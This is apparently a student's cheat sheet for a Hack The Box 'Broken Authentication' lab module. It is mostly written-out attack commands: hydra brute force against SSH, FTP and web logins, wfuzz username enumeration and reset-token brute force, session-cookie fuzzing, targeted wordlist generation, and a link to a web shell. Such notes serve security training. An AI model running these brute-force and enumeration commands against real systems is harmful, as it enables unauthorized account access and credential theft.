Broken Auth
// default credentials
https://www.cirt.net/passwords
// based on CIRT
https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv
https://github.com/scadastrangelove/SCADAPASS/blob/master/scadapass.csv
https://academy.hackthebox.com/storage/modules/80/scripts/basic_bruteforce_py.txt
https://academy.hackthebox.com/storage/modules/80/scripts/basic_bruteforce_php.txt
# Login POST replayed with curl. The header set (Firefox UA, Accept, DNT, Sec-GPC)
# looks like a browser "Copy as cURL" export — confirm; replace URL:PORT with the
# target. The Cookie header carries a fixed PHPSESSID copied from that browser
# session, so it will be stale on a new session; the body submits the test
# credentials username=test / password=test.
curl 'http://URL:PORT/login.php' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://URL:PORT' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://URL:PORT/login.php' -H 'Cookie: PHPSESSID=8iafr4t6c3s2nhkaj63df43v05' -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-GPC: 1' --data-raw 'username=test&password=test'
// rate limit check
https://academy.hackthebox.com/storage/modules/80/scripts/rate_limit_check_py.txt
// username enumeration attack
https://github.com/danielmiessler/SecLists/tree/master/Usernames
// wfuzz
# Username enumeration with wfuzz: FUZZ is replaced by each line of the shortlist
# (-z file,...), sent as Username= with a dummy password (-d); --hs hides responses
# whose body matches "Unknown username", so only usernames the application does
# not reject with that message remain in the output (-c colours the output).
wfuzz -c -z file,/opt/useful/SecLists/Usernames/top-usernames-shortlist.txt -d "Username=FUZZ&Password=dummypass" --hs "Unknown username" http://brokenauthentication.hackthebox.eu/user_unknown.php
// timing attack
https://academy.hackthebox.com/storage/modules/80/scripts/timing_py.txt
// timing app
https://academy.hackthebox.com/storage/modules/80/scripts/timing_php.txt
// timing example
# Run the timing script (the timing_py.txt linked above, saved locally as
# timing.py — confirm the filename) against the username shortlist; presumably it
# measures the response time per username, see the script itself.
python3 timing.py /opt/useful/SecLists/Usernames/top-usernames-shortlist.txt
// Unix grep is not the fastest tool, but it lets us do the job quickly with POSIX regular expressions:
// take a large wordlist and extract only the passwords that match the target's password policy (here: 8-12 characters with at least one uppercase and one lowercase letter).
# Keep only the rockyou.txt entries that are 8-12 characters long and contain at
# least one uppercase and one lowercase letter. Every stage is an order-preserving
# filter, so the filters can be applied in any order with the same result.
grep -E '^.{8,12}$' rockyou.txt | grep '[[:upper:]]' | grep '[[:lower:]]'
// password policy script
https://academy.hackthebox.com/storage/modules/80/password_policy_php.txt
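# Build password.txt from the rockyou-50 sample: keep entries that contain at
# least one uppercase letter and one digit and are 1-25 characters long. grep
# reads the file directly — no cat is needed in front of the pipeline. Note that
# '^.{1,25}$' only bounds the length; it does not check any other policy rule.
grep '[[:upper:]]' /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-50.txt | grep '[[:digit:]]' | grep -E '^.{1,25}$' > password.txt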
// reset-token attack
https://academy.hackthebox.com/storage/modules/80/scripts/reset_token_time_php.txt
// brute force
https://academy.hackthebox.com/storage/modules/80/scripts/reset_token_time_py.txt
# Try every 5-digit token value for user=admin (-z range,00000-99999 substitutes
# FUZZ); --ss shows only the responses whose body contains "Valid".
wfuzz -z range,00000-99999 --ss "Valid" "https://brokenauthentication.hackthebox.eu/token.php?user=admin&token=FUZZ"
// guessable security-question answers
https://academy.hackthebox.com/storage/modules/80/scripts/predictable_questions_php.txt
// python script
https://academy.hackthebox.com/storage/modules/80/scripts/predictable_questions_py.txt
// inject username
https://academy.hackthebox.com/storage/modules/80/scripts/username_injection_php.txt
https://academy.hackthebox.com/storage/modules/80/scripts/username_injection_py.txt
// decode a hex-encoded session cookie
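#######################################
# Decode a plain hex string (e.g. a cookie value) to text and end with a newline.
# printf replaces `echo -n`, whose -n handling is not portable across shells;
# xxd -r -p reverses a plain (postscript-style) hex dump.
# Arguments: $1 - hex string without spaces
# Outputs:   decoded bytes plus a trailing newline on stdout
#######################################
hex_to_text() {
  printf '%s' "$1" | xxd -r -p
  printf '\n'
}
hex_to_text 757365723A6874623B726F6C653A75736572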
https://en.wikipedia.org/wiki/List_of_file_signatures
// CyberChef offers a massive list of decoders,
// but they should be used manually and checked one at a time.
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)To_Hex('Space',0)Gunzip(/breakpoint)&input=SDRzSUFDNGtLR0FBL3dYQU1RMEFBQURDTUxVb29QYVB4UzRNZm4vWUJBQUFBQT09
// By disabling the To Hex step and enabling Gunzip in the CyberChef recipe
// linked above, we can see that the content is indeed gzipped.
// Decodify is a tool that automates guessing the encoding of a value
https://github.com/s0md3v/Decodify
// Look up those two leading bytes (the so-called magic bytes) on the Wikipedia
// "List of file signatures" page.
https://academy.hackthebox.com/storage/modules/80/scripts/automate_cookie_tampering_py.txt
// fuzzing the session cookie
# Fuzz the HTBSESS cookie: john writes every 6-character candidate from its
# LowerNum mode (lowercase letters and digits) to stdout (--stdout, --min-length
# / --max-length 6); wfuzz reads them from stdin (-z stdin) and sends each one as
# the cookie value (-b HTBSESS=FUZZ). --ss shows only responses containing
# "Welcome".
john --incremental=LowerNum --min-length=6 --max-length=6 --stdout| wfuzz -z stdin -b HTBSESS=FUZZ --ss "Welcome" -u https://brokenauthentication.hackthebox.eu/profile.php
https://academy.hackthebox.com/storage/modules/80/scripts/bruteforce_cookie_php.txt
// brute force with Hydra
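# Default-credential pairs (-C: file of colon-separated login:password entries)
# against the HTTP authentication on port 31099 (http-get module, path /).
hydra -C /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 178.211.23.155 -s 31099 http-get /
# User list (-L) against a password list (-P); -u iterates over the users for
# each password, -f stops after the first valid pair.
hydra -L /opt/useful/SecLists/Usernames/Names/names.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -u -f 178.35.49.134 -s 32901 http-get /
# Same target with a single known password (-p) against the whole user list.
# The pasted shell prompt ("ravenloft@htb[/htb]$ ") that preceded this line has
# been removed so that the command is runnable as-is.
hydra -L /opt/useful/SecLists/Usernames/Names/usernames.txt -p amormio -u -f 178.35.49.134 -s 32901 http-get /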
// b374k - a web shell that might allow OS commands to be executed directly.
https://github.com/b374k/b374k
// list the services (modules) supported by hydra
# Print hydra's supported service modules one per line (the -h banner lists them
# after "Supported services:"); a single tr maps both ':' and ' ' to newlines,
# then column lays the names out.
hydra -h | grep 'Supported services' | tr ': ' '\n\n' | column -e
/login.php:[user parameter]=^USER^&[password parameter]=^PASS^:[FAIL/SUCCESS]=[success/failed string]
// syntax for the http-post-form module
"/login.php:[user parameter]=^USER^&[password parameter]=^PASS^:F=<form name='login'"
"/login.php:username=^USER^&password=^PASS^:F=<form name='login'"
// brute-force login.php using admin as the username
# Single user (-l admin) against rockyou via the http-post-form module. The module
# string is path:POST body:failure condition — ^USER^/^PASS^ are substituted per
# attempt, and F=<form name='login' means "the login form is still in the
# response, so the attempt failed". -f stops at the first valid password.
hydra -l admin -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 167.99.192.192 -s 32414 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"
// cupp - Common User Passwords Profiler
# CUPP in interactive mode: it prompts for details about the target person and
# writes a wordlist file (here william.txt, pruned by the sed commands below —
# confirm the output filename from cupp's final prompt).
cupp -i
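#######################################
# Prune a CUPP wordlist in place so that only candidates meeting the policy
# survive: at least 8 characters, at least one ASCII punctuation character and
# at least one digit. One sed pass with three delete commands replaces three
# separate in-place rewrites of the file: 'd' ends processing of the current
# line, so a line is dropped as soon as one rule matches, exactly as before.
# '{0,7}' is the POSIX spelling of GNU's '{,7}'; -r and -i are GNU sed options.
# Arguments: $1 - wordlist file to rewrite
#######################################
prune_wordlist() {
  sed -r -i \
    -e '/^.{0,7}$/d' \
    -e '/[!-/:-@\[-`\{-~]+/!d' \
    -e '/[0-9]+/!d' \
    "$1"
}
prune_wordlist william.txt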
// wordlist mangling tools
https://github.com/digininja/RSMangler
https://github.com/sc0tfree/mentalist.git
// Username Anarchy can generate a list of potential username formats from a person's name
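# Clone Username Anarchy and generate candidate usernames for "Bill Gates". The
# executable lives inside the cloned directory, so a cd is required first:
# straight after the clone, ./username-anarchy names the directory just created,
# not the script, and the original two-liner fails with "Is a directory".
git clone https://github.com/urbanadventurer/username-anarchy.git
cd username-anarchy || exit 1
./username-anarchy Bill Gates > bill.txt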
// SSH bruteforce
# SSH brute force with the generated username list (bill.txt) and the pruned CUPP
# list (william.txt); -u iterates users per password, -f stops at the first valid
# pair, -t 4 caps the number of parallel connections.
hydra -L bill.txt -P william.txt -u -f ssh://178.35.49.134:22 -t 4
// FTP bruteforce
# FTP brute force for the single user m.gates against the local host with a
# rockyou sample (rockyou-10.txt).
hydra -l m.gates -P rockyou-10.txt ftp://127.0.0.1
// brute-force a web server protected by HTTP Basic Auth
# Default-credential pairs (-C: colon-separated login:password file) against the
# HTTP Basic Auth on port 32273 (http-get module, path /).
hydra -C /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 178.128.35.43 -s 32273 http-get /
// hydra brute-force with a custom header and http-post-form - check the actual form parameter names first (e.g. in Burp)
# http-post-form with the user fixed in the body (user=user — ^USER^ is not used,
# so -l only satisfies hydra's login requirement) and ^PASS^ taken from the
# probable-v2 list. H= adds an Authorization: Basic header (the base64 decodes to
# "user:password"; presumably the Basic Auth already found on this host — confirm)
# with the colon escaped as \:. F= marks a response still showing the log-in form
# as a failed attempt; -f stops at the first valid password.
hydra -l user -P /opt/useful/SecLists/Passwords/probable-v2-top12000.txt -f 178.128.35.43 -s 32273 http-post-form "/admin_login.php:user=user&pass=^PASS^:H=Authorization\: Basic dXNlcjpwYXNzd29yZA==:F=<form name='log-in'"
// Final
# Final exercise: fuzz the user=support.FUZZ field of messages.php with the
# entries of country2.txt while sending the htb_sessid session cookie (-b);
# --hs hides responses whose body matches "Cannot send message", -v is verbose,
# -c colours the output.
wfuzz -v -c -z file,country2.txt -b "htb_sessid=ZWUxMWNiYjE5MDUyZTQwYjA3YWFjMGNhMDYwYzIzZWU%3D;" -d "user=support.FUZZ&message=testing&submit=submit" --hs "Cannot send message" http://157.245.43.134:30524/messages.php
# Candidates from the system rockyou list that begin with an uppercase letter,
# end with a digit, contain at least one non-alphanumeric character and are
# 20-29 characters long. The greps are order-preserving filters; awk stays last
# so the pipeline's exit status is unchanged.
grep '[^A-Za-z0-9]' /usr/share/wordlists/rockyou.txt | grep '[0-9]$' | grep '^[A-Z]' | awk '20 <= length && length <= 29'
Keep track of the tests performed.